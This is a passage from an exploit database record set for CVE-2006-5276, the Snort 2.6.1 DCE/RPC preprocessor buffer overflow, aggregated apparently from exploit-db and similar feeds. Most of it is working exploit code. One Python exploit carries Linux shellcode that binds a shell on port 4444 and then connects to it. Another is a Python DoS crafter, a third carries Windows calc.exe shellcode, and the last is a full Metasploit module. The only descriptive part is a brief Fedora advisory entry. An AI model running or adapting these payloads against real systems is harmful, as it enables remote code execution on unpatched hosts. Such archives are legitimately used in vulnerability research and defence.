The exploit binds a shell to TCP port 4444 and connects to it.\n# This code was tested against snort-2.6.1 running on Red Hat Linux 8\n#\n# Author shall bear no responsibility for any screw ups caused by using this code\n# Winny Thomas :-)\n\nimport os\nimport sys\nimport time\nfrom scapy import *\n\n# Linux portbind shellcode; Binds shell on TCP port 4444\nshellcode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\"\nshellcode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\"\nshellcode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\"\nshellcode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\nshellcode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\"\nshellcode += \"\\x89\\xe1\\xcd\\x80\"\n\ndef ExploitSnort(target):\n # SMB packet borrowed from http://www.milw0rm.com/exploits/3391\n # NetBIOS Session Service\n smbreq = \"\\x00\\x00\\x02\\xab\"\n\n # SMB Header\n smbreq += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\n smbreq += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\n smbreq += \"\\x00\\x08\\x30\\x00\"\n\n # Tree Connect AndX Request\n smbreq += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\n smbreq += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\n smbreq += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\n smbreq += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n # NT Create AndX Request\n smbreq += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\n smbreq += 
\"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\n smbreq += \"\\x63\\x00\\x00\\x00\"\n\n # Write AndX Request #1\n smbreq += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x10\\x02\\x00\\x00\\x01\\x00\\x00\\x00\"\n smbreq += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\n smbreq += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\n smbreq += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n # Write AndX Request #2\n smbreq += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\xce\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\xed\\x1e\\x94\\x7c\\x90\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\"\n smbreq += \"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa9\"\n # The following address overwrites RET and points into our shellcode\n smbreq += struct.pack('<L', 0xbfffeff0)\n smbreq += '\\x90' * 50\n smbreq += shellcode\n smbreq += '\\x90' * 130\n\n packet = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / smbreq\n send(packet)\n\ndef ConnectRemoteShell(target):\n connect = '/usr/bin/telnet ' + target + ' 4444'\n os.system(connect)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <ip of a host on snort network>' % sys.argv[0]\n sys.exit(-1)\n\n print '[+] Sending malformed SMB packet'\n ExploitSnort(target)\n print '[+] Connecting to remote shell in 3 seconds...'\n time.sleep(3)\n ConnectRemoteShell(target)\n\n# milw0rm.com [2007-03-30]\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3609/"}, {"lastseen": "2016-01-31T18:18:38", "description": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit. CVE-2006-5276. Dos exploits for multiple platform", "published": "2007-02-23T00:00:00", "type": "exploitdb", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-02-23T00:00:00", "id": "EDB-ID:3362", "href": "https://www.exploit-db.com/exploits/3362/", "sourceData": "#!/usr/bin/python\n#\n# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)\n# \n# Author: Trirat Puttaraksa <trir00t [at] gmail.com>\n#\n# http://sf-freedom.blogspot.com\n#\n######################################################\n# For educational purpose only\n#\n# This exploit just crashes Snort 2.6.1 on Fedora Core 4. However, Code Execution\n# may be possible, but I have no time to make it :( \n# I will post the information about this vulnerability in my blog soon\n#\n# Note: this exploit uses Scapy (http://www.secdev.org/projects/scapy/) \n# to inject the packet, so you have to install Scapy before using it.\n#\n#######################################################\n\nimport sys\nfrom scapy import *\nfrom struct import pack\nconf.verb = 0\n\n# NetBIOS Session Service\npayload = \"\\x00\\x00\\x01\\xa6\"\n\n# SMB Header\npayload += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\npayload += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\npayload += \"\\x00\\x08\\x30\\x00\"\n\n# Tree Connect AndX Request\npayload += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\npayload += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\npayload += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\npayload += 
\"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n# NT Create AndX Request\npayload += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\npayload += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\npayload += \"\\x63\\x00\\x00\\x00\"\n\n# Write AndX Request #1\npayload += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n# Write AndX Request #2\npayload += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\x30\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\nif len(sys.argv) != 2:\n\tprint \"Usage snort_dos_dcerpc.py <fake destination ip>\"\n\tsys.exit(1)\n\ntarget = sys.argv[1]\n\np = IP(dst=target) / TCP(sport=1025, 
dport=139, flags=\"PA\") / payload\nsend(p)\n\n# milw0rm.com [2007-02-23]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3362/"}, {"lastseen": "2016-01-31T18:22:44", "description": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit. CVE-2006-5276. Remote exploit for windows platform", "published": "2007-03-01T00:00:00", "type": "exploitdb", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-01T00:00:00", "id": "EDB-ID:3391", "href": "https://www.exploit-db.com/exploits/3391/", "sourceData": "#!/usr/bin/python\n#\n# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)\n# \n# Author: Trirat Puttaraksa <trir00t [at] gmail.com>\n#\n# http://sf-freedom.blogspot.com\n#\n######################################################\n# For educational purpose only\n#\n# This exploit calls calc.exe on Windows XP SP2 + Snort 2.6.1\n#\n# Note: this exploit uses Scapy (http://www.secdev.org/projects/scapy/) \n# to inject the packet, so you have to install Scapy before using it.\n#\n#######################################################\n\nimport sys\nfrom scapy import *\nfrom struct import pack\nconf.verb = 0\n\n# NetBIOS Session Service\npayload = \"\\x00\\x00\\x02\\xab\"\n\n# SMB Header\npayload += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\npayload += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\npayload += \"\\x00\\x08\\x30\\x00\"\n\n# Tree Connect AndX Request\npayload += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\npayload += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\npayload += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\npayload += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n# NT 
Create AndX Request\npayload += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\npayload += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\npayload += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\npayload += \"\\x63\\x00\\x00\\x00\"\n\n# Write AndX Request #1\npayload += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\n#payload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x10\\x02\\x00\\x00\\x01\\x00\\x00\\x00\"\npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n# Write AndX Request #2\npayload += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\npayload += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\xce\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\n# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com)\npayload += \"\\xed\\x1e\\x94\\x7c\\x90\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\"\n\npayload += \"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa9\"\npayload += \"\\xd1\\x80\\xf5\\x83\\xeb\\xfc\\xe2\\xf4\\x55\\x39\\xc4\\xf5\\xa9\\xd1\\x0b\\xb0\"\npayload += \"\\x95\\x5a\\xfc\\xf0\\xd1\\xd0\\x6f\\x7e\\xe6\\xc9\\x0b\\xaa\\x89\\xd0\\x6b\\xbc\"\npayload += \"\\x22\\xe5\\x0b\\xf4\\x47\\xe0\\x40\\x6c\\x05\\x55\\x40\\x81\\xae\\x10\\x4a\\xf8\"\npayload += 
\"\\xa8\\x13\\x6b\\x01\\x92\\x85\\xa4\\xf1\\xdc\\x34\\x0b\\xaa\\x8d\\xd0\\x6b\\x93\"\npayload += \"\\x22\\xdd\\xcb\\x7e\\xf6\\xcd\\x81\\x1e\\x22\\xcd\\x0b\\xf4\\x42\\x58\\xdc\\xd1\"\npayload += \"\\xad\\x12\\xb1\\x35\\xcd\\x5a\\xc0\\xc5\\x2c\\x11\\xf8\\xf9\\x22\\x91\\x8c\\x7e\"\npayload += \"\\xd9\\xcd\\x2d\\x7e\\xc1\\xd9\\x6b\\xfc\\x22\\x51\\x30\\xf5\\xa9\\xd1\\x0b\\x9d\"\npayload += \"\\x95\\x8e\\xb1\\x03\\xc9\\x87\\x09\\x0d\\x2a\\x11\\xfb\\xa5\\xc1\\xaf\\x58\\x17\"\npayload += \"\\xda\\xb9\\x18\\x0b\\x23\\xdf\\xd7\\x0a\\x4e\\xb2\\xe1\\x99\\xca\\xff\\xe5\\x8d\"\npayload += \"\\xcc\\xd1\\x80\\xf5\"\n\npayload += \"\\x90\" # padding\n\nif len(sys.argv) != 2:\n\tprint \"Usage snort_execute_dcerpc.py <fake destination ip>\"\n\tsys.exit(1)\n\ntarget = sys.argv[1]\n\np = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / payload\nsend(p)\n\n# milw0rm.com [2007-03-01]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3391/"}, {"lastseen": "2016-02-02T10:19:08", "description": "Snort 2 DCE/RPC preprocessor Buffer Overflow. CVE-2006-5276. Remote exploits for multiple platform", "published": "2012-04-09T00:00:00", "type": "exploitdb", "title": "Snort 2 DCE/RPC preprocessor Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2012-04-09T00:00:00", "id": "EDB-ID:18723", "href": "https://www.exploit-db.com/exploits/18723/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Capture\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Snort 2 DCE/RPC preprocessor Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module allows remote attackers to execute arbitrary code by exploiting the\r\n\t\t\t\tSnort service via crafted SMB traffic. The vulnerability is due to a boundary\r\n\t\t\t\terror within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,\r\n\t\t\t\twhich may result in a stack-based buffer overflow with a specially crafted packet\r\n\t\t\t\tsent on a network that is monitored by Snort.\r\n\r\n\t\t\t\tVulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.\r\n\r\n\t\t\t\tAny host on the Snort network may be used as the remote host. 
The remote host does not\r\n\t\t\t\tneed to be running the SMB service for the exploit to be successful.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Neel Mehta', #Original discovery (IBM X-Force)\r\n\t\t\t\t\t'Trirat Puttaraksa', #POC\r\n\t\t\t\t\t'Carsten Maartmann-Moe <carsten[at]carmaa.com>', #Metasploit win\r\n\t\t\t\t\t'0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '32094' ],\r\n\t\t\t\t\t[ 'CVE', '2006-5276' ],\r\n\t\t\t\t\t[ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],\r\n\t\t\t\t\t[ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],\r\n\t\t\t\t\t[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 390,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x00407c01, # JMP ESP snort.exe\r\n\t\t\t\t\t\t\t'Offset' => 289, # The number of bytes before overwrite\r\n\t\t\t\t\t\t\t'Padding' => 0\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Redhat 8',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xbffff110,\r\n\t\t\t\t\t\t\t'Offset' => 317,\r\n\t\t\t\t\t\t\t'Padding' => 28\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DisclosureDate' => 'Feb 19 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(139),\r\n\t\t\t\tOptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' 
]),\r\n\t\t\t\tOptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])\r\n\t\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')\r\n\tend\r\n\r\n\tdef exploit\r\n\t\topen_pcap\r\n\r\n\t\tshost = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\r\n\t\tp = buildpacket(shost, rhost, rport.to_i)\r\n\r\n\t\tprint_status(\"Sending crafted SMB packet from #{shost} to #{rhost}:#{rport}...\")\r\n\r\n\t\tcapture_sendto(p, rhost)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef buildpacket(shost, rhost, rport)\r\n\t\tp = PacketFu::TCPPacket.new\r\n\t\tp.ip_saddr = shost\r\n\t\tp.ip_daddr = rhost\r\n\t\tp.tcp_dport = rport\r\n\t\tp.tcp_flags.psh = 1\r\n\t\tp.tcp_flags.ack = 1\r\n\r\n\t\t# SMB packet borrowed from http://exploit-db.com/exploits/3362\r\n\r\n\t\t# NetBIOS Session Service, value is the number of bytes in the TCP segment,\r\n\t\t# must be greater than the total size of the payload. Statically set.\r\n\t\theader = \"\\x00\\x00\\xde\\xad\"\r\n\r\n\t\t# SMB Header\r\n\t\theader << \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\r\n\t\theader << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\r\n\t\theader << \"\\x00\\x08\\x30\\x00\"\r\n\r\n\t\t# Tree Connect AndX Request\r\n\t\theader << \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\r\n\t\theader << \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\r\n\t\theader << \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\r\n\t\theader << \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\r\n\r\n\t\t# NT Create AndX Request\r\n\t\theader << \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\theader << \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\theader << \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\r\n\t\theader << 
\"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\r\n\t\theader << \"\\x63\\x00\\x00\\x00\"\r\n\r\n\t\t# Write AndX Request #1\r\n\t\theader << \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\r\n\t\theader << \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\r\n\t\theader << \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\t\theader << \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\t\theader << \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\r\n\t\theader << \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\r\n\t\theader << \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\r\n\r\n\t\t# Write AndX Request #2\r\n\t\theader << \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\r\n\t\theader << \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\"\r\n\t\ttail = \"\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\r\n\r\n\t\t# Return address\r\n\t\teip = [target['Ret']].pack('V')\r\n\r\n\t\t# Sploit\r\n\t\tsploit = make_nops(10)\r\n\t\tsploit << payload.encoded\r\n\r\n\t\t# Padding (to pass size check)\r\n\t\tsploit << make_nops(1)\r\n\r\n\t\t# The size to be included in Write AndX Request #2, including sploit payload\r\n\t\trequestsize = [(sploit.size() + target['Offset'])].pack('v')\r\n\r\n\t\t# Assemble the parts into one package\r\n\t\tp.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit\r\n\r\n\t\tp.recalc\r\n\r\n\t\tp\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18723/"}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5276"], "description": "Snort is a libpcap-based packet sniffer/logger which can 
be used as a lightweight network intrusion detection system. It features rules-based logging and can perform protocol analysis, content searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. Snort has a real-time alerting capability, with alerts being sent to syslog, a separate \"alert\" file, or as a WinPopup message via Samba's smbclient. Edit /etc/snort.conf to configure snort and use snort.d to start snort. This rpm is different from previous rpms and while it will not clobber your current snortd file, you will need to modify it. There are 9 different packages available. All of them require the base snort rpm. Additionally, you will need to choose a binary to install. /usr/sbin/snort should end up being a symlink to a binary in one of the following configurations: plain, plain+flexresp, mysql, mysql+flexresp, postgresql, postgresql+flexresp, snmp, snmp+flexresp, bloat (mysql+postgresql+flexresp+snmp). Please see the documentation in /usr/share/doc/snort-2.7.0.1. There are no rules in this package; the license they are released under forbids us from repackaging them and redistributing them. 
", "modified": "2007-09-07T17:20:21", "published": "2007-09-07T17:20:21", "id": "FEDORA:L87HK0TM000738", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: snort-2.7.0.1-3.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:48", "description": "\nSnort 2.6.1 (Linux) - DCERPC Preprocessor Remote Buffer Overflow", "edition": 1, "published": "2007-03-30T00:00:00", "title": "Snort 2.6.1 (Linux) - DCERPC Preprocessor Remote Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-30T00:00:00", "id": "EXPLOITPACK:972D8B6C7B644A1017D14AAFD8E54233", "href": "", "sourceData": "#!/usr/bin/python\n#\n# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in\n# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.\n# This code was tested against snort-2.6.1 running on Red Hat Linux 8\n#\n# Author shall bear no responsibility for any screw ups caused by using this code\n# Winny Thomas :-)\n\nimport os\nimport sys\nimport time\nfrom scapy import *\n\n# Linux portbind shellcode; Binds shell on TCP port 4444\nshellcode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\"\nshellcode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\"\nshellcode += 